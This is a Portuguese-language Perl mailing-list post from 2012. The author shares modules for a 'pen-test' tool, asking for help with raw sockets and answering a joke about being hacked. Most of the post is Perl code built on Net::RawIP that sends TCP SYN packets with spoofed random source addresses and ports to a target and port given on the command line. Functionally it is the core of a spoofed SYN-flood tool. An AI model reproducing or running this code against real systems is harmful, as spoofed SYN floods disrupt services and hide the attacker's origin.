[Rio-pm] Problemas com rawsocket

Aureliano Guedes guedes_1000 em hotmail.com
Sexta Abril 20 14:21:14 PDT 2012

Gabriel Vieira, se conseguisse ter acesso ao meu pc vc seria uns dos hacker mais fodoes do mundo, mas mesmo assim não iria conseguir nada de interessante,
pois não logo nem guardo arquivos no HD.... XD, se fizer isso, faz um favor pra mim, formata ele pois estou com preguissa de fazer isso, instala ou Ubuntu ou Mandriva com
dual boot com W7. LOL

Lorn, meu codigo esta totalmente aos pedaços, pois não to desenvolvendo um Syn Flood para brincar de Anonymous, estou desenvolvendo um sistema de pen-test,
mas essa é so a primeira etapa. Ou seja, dividi em modulos.
Mas ai vai...

###########__Packs.pm__#############

package Packs;

use common::sense;
use Net::RawIP;
use Packs::PacksSize;
use Packs::RandonIp;

sub new {
    my $class = shift;

    my $self = {};
    $self->{TARGET} = undef;
    $self->{PORT} = undef;

    bless ($self, $class);
    return $self;
}

sub target{
    my $self = shift;
    $self->{TARGET} = shift if @_;
    return $self->{TARGET}
}

sub port {
    my $self = shift;
    $self->{PORT} = shift if @_;
    return $self->{PORT};
}

sub send{
    my $ip = RandonIp->new;
    my $size = PacksSize->new;
    my $n = Net::RawIP->new({
        ip => {
            saddr => $ip,
            daddr => &target,
        },
        tcp => {
            source => $size,
            dest => &port,
            psh => 1,
            syn => 1,
        },
    });
    $n->send;
    return $n;
}

1;

#################################

** Dentro de uma pasta chamada Packs:

##########__RandonIp.pm__###########

package Packs::RandonIp;

use common::sense;

#create random ip
sub new {
    my $ip = join (".", map int rand (256), 1..4);
    return $ip;
}

1;

#################################

##########__PacksSize.pm__###########

package Packs::PacksSize;

use common::sense;

sub new {
    my $pac = int rand(65500) + 1;
    return $pac;
}

1;

#################################

** Script teste:

############__teste.pl__#############

use common::sense;
use Packs;

for (1..4){

    my $p = Packs->new();
    $p->target($ARGV[0]);
    $p->port($ARGV[1]);
    $p->send;
}

Nomes não são definitivos, mas ai esta a parte problemática.